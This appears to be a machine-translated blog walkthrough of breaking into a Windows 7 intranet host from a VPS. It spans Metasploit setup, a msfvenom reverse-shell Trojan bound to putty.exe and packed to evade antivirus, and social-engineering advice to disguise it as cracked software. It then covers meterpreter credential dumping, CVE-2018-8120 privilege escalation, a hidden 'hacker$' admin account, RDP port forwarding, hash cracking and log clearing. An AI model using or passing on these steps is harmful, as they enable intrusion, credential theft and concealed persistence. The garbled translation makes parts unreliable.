vps penetrate intranet win7 host

Get ready

Environmental Science:

centos7: (Temporary application for public network ip registration for experimentation)
Metasploit osmosis framework
Cve-2018-8120 Local Authorization Execution Document
Windows exploit sugger
Putty Execution File
Lcx (Port Forwarding Tool under windows)
Portmap (Port Forwarding Tool under linux)
Saminside (crack system user password)

Attack Topology

vps Configuration Attack Environment:

centos7 installation metasploit

apt-get install curl,wget
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall      //Grant execution privileges to msfinstall
                          //After successful installation, run the subordinate code to connect the latest version of msf downloaded to the database.
adduser msf               //Add msf user, here will be prompted to enter the password for the new account
su msf                    //Switch user to msf

Generate a Trojan horse and bind the program (you can also use shellter to bind the Trojan horse to the program for personal habits):

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=8001 -e x86/shikata_ga_nai -x putty.exe  -k -i 5 -f exe -o backdoor.exe
msfvenom -p windows/shell_reverse_tcp Intended to use shell_reverse_tcp Attack Load
LHOST= This step is to set up an attacker IP address
LPORT=8001 This step is to set up a Trojan that will actively connect to the listening port set by the attacker
-e x86/shikata_ga_nai This step means to use shikata_ga_nai The encoding method for the attack payload is re-coded to avoid killing by re-coding
-x putty.exe This step means to bundle a Trojan horse to the specified executable template, where putty.exe
-i 5 This means to code the target five times using the encoding method just set. (Multiple encoding theoretically helps to avoid killing, but it is not necessarily because killing is not free of charge after all. With the rapid development of killing-free technology, new killing-free technology will be targeted by major security manufacturers as soon as it appears.)
-f exe This step means specifying MSF Encoder output format is exe
-o backdoor.exe This step means specifying the file output path after processing is complete

Use kali's upx to shell the Trojan horse program to bypass kill

upx -5 backdoor.exe

Shell successfully, scan.

Interruption, nothing, Trojan killing operations down to study.
Another way of thinking is to bind the Trojan to the cracking software, because the download execution of cracking software on the Internet will generally advise users to close the protective wall, and use this social worker idea to achieve the target of the Trojan to be downloaded and executed.(Trojan horse needs to be renamed to normal name, e.g. putty green version.exe, after all backdoor, shell and so on are too brain-damaged, people will know at a glance that there is a problem with this execution file.)

Get meterpreter shell, view system information

[root@vultr ~]# msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 
msf5 exploit(multi/handler) > set LPORT 8001
LPORT => 8001
msf5 exploit(multi/handler) > run

Target machine executes Trojan file, vps gets meterpreter shell

meterpreter > getuid         //View current user
meterpreter > sysinfo        //View system information
meterpreter > ps             //View system processes
meterpreter > netstat -ano   //View System Open Ports
meterpreter > shell          //Get an interactive shell
meterpreter >run hashdump    //Get user password hash
meterpreter >load mimikatz   //Loading mimikatz
meterpreter >Kerberos        //Get User Clear Text Password

Insufficient permissions to obtain user password or hash value.


Generate system information systeminfo.txt

meterpreter > shell             //Get an interactive shell
C:\Users\wwb\Desktop>systeminfo >systeminfo.txt //Generate system configuration information file for systeminfo.txt in current directory

Use of Window Vulnerability Advisor (Windows-Exploit-Suggester)

meterpreter >download c:\\Users\\wwb\\Desktop\\systeminfo.txt //Download systeminfo.txt back to local

python wes.py --update        //Microsoft Official Download Vulnerability Library
python wes.py -e systeminfo.txt >result.txt  //Compare patches to obtain available vulnerability information and store it in result.txt in the current file

Check result.txt to select exploit vulnerability.

cve-2018-8120 Titlement Tool

Find the arsenal, there are cve-2018-8120 local enforcement procedures.
Meterpreter > upload/root/CVE-2018-8120.exe c:\Users\wb\Desktop //Upload to the desktop directory of the target host
meterpreter > shell
 C:UserswwbDesktop>cve-2018-8120.exe "whoami" //Title

C:\Users\wwb\Desktop>cve-2018-8120.exe "net user hacker$ hacker /add" //Add hacker$Hide user, password is hacker
C:\Users\wwb\Desktop>cve-2018-8120.exe "net localgroup administrators hacker$ /add" //Add hacker$to Management Group

Get original administrator password

Port Mapping

upload lcx.exe To target file:
meterpreter > upload /root/lcx.exe c:\\Users\\wwb\\Desktop //Upload to target host desktop directory
meterpreter >shell
C:\Users\wwb\Desktop>netstat -ano              //View open ports
C:\Users\wwb\Desktop>lcx -slave 55 3389 //Map port 3389 to public network port 55
[root@vultr ~]# . /portmap-m 2-p1 55-p2 56 //listen on port 55 and forward to port 56

Remote service is on:

Port Mapping

vps opens a new terminal execution port for listening and forwarding:

saminside tool

Because vps does not have Desktop Services installed, another win10 host is used to connect to the target host remotely.
Open the remote desktop connection and set the drive (Remote Desktop Connection - Local Resources - Details), log in to the hacker $account remotely, and upload Samin (instead of using meterpreter's upload upload).However, in the real environment, do not allow the real host to interact with the target host in traffic. In the middle, many vps will be used to transfer to hide their own effect.)

Execute Samin as an administrator

The password is too complex to be understood and needs external assistance.
Online cracking system password hash

Get Administrator Account Password: wwb/asd123

Clear Traces

Log in remotely using the original administrator account.

Clear the added hacker$account

Clear Uploaded Utilization Files

When deleting lcx, deletion was found because we need to map port 3389 of the target to vps with this executable file. For this continually used executable, find a folder to hide it.

Clear Log

Continuous updates and improvements,,,

Tags: shell Windows encoding network

Posted on Tue, 03 Sep 2019 18:22:27 -0700 by samsunnyuk